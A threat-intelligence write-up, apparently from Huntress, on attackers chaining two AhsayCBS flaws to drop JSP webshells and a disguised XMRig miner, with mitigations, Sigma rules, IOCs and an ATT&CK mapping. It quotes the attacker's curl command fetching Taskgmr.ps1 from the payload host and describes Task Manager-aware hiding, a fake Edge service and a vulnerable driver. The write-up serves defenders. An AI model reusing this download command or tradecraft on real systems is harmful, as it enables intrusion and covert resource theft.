Acknowledgements: Special thanks to Dipo Rodipe, John Hammond, Susannah Matt, Ben Nahorney, and Lindsey Welch for their contributions to this investigation and writeup.
Background
Huntress is observing threat actors targeting vulnerabilities in AhsayCBS (Cloud Backup Server), the management console for Ahsay's backup software (developed by Ahsay systems). AhsayCBS is primarily used by managed service providers (MSPs) and system integrators; it centralizes control of backup operations, letting administrators create and manage users, configure backup policies, and more.
On October 4, two vulnerabilities were identified in AhsayCBS versions up to 10.3.2:
CVE-2026-105133: A medium-severity flaw affecting the
checkSysPwdfunction of the filecom/ahsay/obs/api/ApiStructsAction.java, which can lead to improper authentication.CVE-2026-105134: A critical-severity vulnerability affecting
/rps/api/json/UpdateReceivers.doof the component Replication Receiver in AhsayCBS, which can be exploited to achieve unauthenticated remote code execution as NT AUTHORITY/SYSTEM on the host. The API contains an authentication bypass that could allow for a random token to substitute valid credentials. After exploitation, a threat actor configured a malicious receiver and dropped a Java Server Page (JSP) webshell into the application directory served by the CBS application.
Huntress is seeing these two vulnerabilities being chained together in order to gain access to targeted systems. First, CVE-2026-105133 is used to bypass authentication. Then CVE-2026-105134 is used to gain code execution.
The NVD records for both flaws also said that an exploit had been published, and upgrading to version 10.3.4 mitigates the issue. Version 10.3.4 was released August 5, 2026, according to Ahsay's documentation.
Starting 2026-10-07 23:20:15 UTC, Huntress observed threat actors exploiting the vulnerabilities to gain unauthenticated remote code execution and deploy webshells on exposed systems. Initially, we picked up on several suspicious command lines spawning from AhsayCBS executable files (cbssvcX64.exe).
Figures 1 and 2: Suspicious child processes spawning from cbssvcX64.exe
Below, we're outlining the post-exploitation behavior observed and our analysis of the vulnerabilities in an effort to help defenders get ahead of this threat.
Post-exploitation activity
In some incidents we saw threat actors deploy .jsp webshells in the web application directory immediately after exploitation. Across several other incidents, we observed cbssvcX64.exe spawn a series of commands to drop several files in either the %TEMP% or ../AppData/Local/Temp folder from hxxp://imagefiles-backup.oss-ap-southeast-7.aliyuncs[.]com. These included Taskgmr.ps1, msedge.exe, edge.exe, and config.json.
Cryptominers
We also saw threat actors launch cryptomining operations via XMRig, a legitimate open-source Monero miner that attackers frequently install on compromised systems to covertly consume CPU resources and generate cryptocurrency for themselves.
On several endpoints we observed the XMRig miner (edge.exe), renamed to masquerade as a Microsoft Edge process, being dropped in Temp folders, followed by miner network connections being established on port 8029 to an XMR pool (51.195.127[.]124:8029, xmr.kryptex[.]network).
The actors executed PowerShell to modify config.json in the Temp folder, before creating a Windows service (MicrosoftEdgeUpdateSvc) that is designed to look similar to the actual Microsoft Edge Update service (edgeupdate). This service helped the attackers establish persistence on the endpoint, and was configured to run msedge.exe (one of the files downloaded earlier via the curl command from cbssvcX64.exe) from the Temp folder with SYSTEM privileges.
Figure 3: VirusTotal results for msedge.exe
Further investigation showed msedge.exe is a modified copy of the legitimate NSSM utility. NSSM can support other programs to ensure they stay running and restart after a crash or reboot, and threat actors in this incident likely used it to maintain persistence for edge.exe, while disguising the service-related binary as a legitimate-looking file.
PS1 Script/Task Manager
Taskgmr.ps1 appears to be an AI-assisted script (given the commented code) that supports cryptomining operations after being launched via curl:
curl -sk -o "C:\Users\ADMINI~1\AppData\Local\Temp\Taskgmr.ps1" "http://imagefiles-backup.oss-ap-southeast-7.aliyuncs[.]com/javas/Office/win/Taskgmr.ps1" --max-time 60
This script has several built-in anti-analysis functionalities. For instance, it checks continuously for the Task Manager. If Task Manager is opened it stops MicrosoftEdgeUpdateSvc to hide the cryptomining activity. When the Task Manager is closed, it restarts it again.
The script also kills Task Manager at a specific time (18:00) and if it was left open for more than one hour during overnight hours. The script used the endpoint's local Get-Date time as opposed to UTC.
Vulnerable Kernel Driver
In one of the incidents, Huntress observed threat actors using Windows' built-in certutil.exe to download a file to the TEMP folder (C:\Users\REDACTED\AppData\Local\Temp\WinRing0x64.sys) from hxxp://imagefiles-backup.oss-ap-southeast-7.aliyuncs[.]com.
WinRing0x64.sys is a known legitimate but vulnerable kernel driver that's part of the WinRing0 library (from OpenLibSys) and that provides low-level access to system hardware. Vulnerable drivers are often brought into attacks to disable endpoint security tools, but this case appeared to serve a different purpose.
By loading this driver, the attackers enabled the miner to operate with kernel-level access to the underlying hardware, supporting the cryptomining operation outlined above with the broadest possible control and performance. This capability has been previously publicly reported in other unrelated attacks.
Mitigation guidance for impacted organizations
AhsayCBS version 10.3.4 is not impacted by these vulnerabilities; organizations that use the backup utility should ensure they are running this version and upgrade immediately if they are not.
Organizations should also restrict AhsayCBS management interface web access, as the exploit targets the externally accessible web app service on the host. Access should be limited to trusted IP addresses only or require VPN. If any of the IoCs listed in this blog have been uncovered, companies should carry out a full host re-image from a trusted backup; as attackers have been able to hide secondary backdoors for extended persistence.
Huntress is currently working with potentially impacted organizations across our customer base to apply these mitigations; we recommend that all Ahsay customers adhere to these mitigations.
Sigma Rules
We've published four Sigma rules for this activity in the Huntress threat-intel repository (2026/2026-10/AhsayCBS_XMRig_Miner). They are post-exploitation detections written specifically for this campaign, and each targets a step the actor relies on to deploy, hide, or run the cryptominer, so alerting on any one of them gives defenders a chance to interrupt the chain. They follow the intrusion in the order described above.
Unexpected Child Process from AhsayCBS Service flags any process spawned by
cbssvcX64.exeorcbssvcX86.exeoutside the service's normal startup and maintenance commands. Because AhsayCBS runs its web app inside the service process, commands from an uploaded JSP webshell appear as direct children of the service.Fake Edge Binary Launched with Daemonized Flag flags Edge-named binaries that carry the
msedge_exeoriginal file name or run with--daemonized. Here, a renamed NSSM and the XMRig miner posed as Microsoft Edge.PowerShell Scriptblock - Task Manager Aware Service Control flags a script block that checks for Task Manager and stops or starts a service to match, which is how
Taskgmr.ps1hides the miner from users. It matches that pairing rather than the service name, so renaming the service won't evade it.WinRing0 Driver Downloaded via Command Line flags a command line that names
WinRing0alongside a URL. Miner droppers fetch the vulnerable driver this way, while legitimate hardware-monitoring tools ship it inside their installers.
Indicators of Compromise (IOCs)
Item | Description |
|---|---|
| Network Infrastructure |
| Payload Hosting (Alibaba Cloud Object Storage) |
| Crypto Pool & Unique Identifier |
SHA256:
| Modified NSSM utility |
SHA256:
| Miner |
SHA256:
| Powershell script |
MITRE ATT&CK Mapping
Tactic | Technique ID | Technique Name | Description |
|---|---|---|---|
Resource Development | T1608.001 | Stage Capabilities: Upload Malware | Staged |
Initial Access | T1190 | Exploit Public-Facing Application | Chained CVE-2026-105133 (authentication bypass) and CVE-2026-105134 (RCE through |
Execution | T1059.001 | Command and Scripting Interpreter: PowerShell | Ran |
T1059.003 | Command and Scripting Interpreter: Windows Command Shell |
| |
T1569.002 | System Services: Service Execution | Ran | |
Persistence | T1505.003 | Server Software Component: Web Shell | Configured a malicious replication receiver and dropped a JSP webshell into the directory the CBS application serves |
T1543.003 | Create or Modify System Process: Windows Service | Created the | |
Privilege Escalation | T1543.003 | Create or Modify System Process: Windows Service | Configured the service to run with |
Defense Evasion | T1036.004 | Masquerading: Masquerade Task or Service | Named the service |
T1036.005 | Masquerading: Match Legitimate Resource Name or Location | Renamed the NSSM utility to | |
T1564 | Hide Artifacts |
| |
Discovery | T1057 | Process Discovery |
|
T1124 | System Time Discovery |
| |
Command and Control | T1105 | Ingress Tool Transfer | Downloaded payloads to |
T1071.001 | Application Layer Protocol: Web Protocols | Retrieved payloads over HTTP from Alibaba Cloud OSS | |
T1571 | Non-Standard Port | Miner connected to the XMR pool on port 8029 ( | |
Impact | T1496.001 | Resource Hijacking: Compute Hijacking | Deployed an XMR miner ( |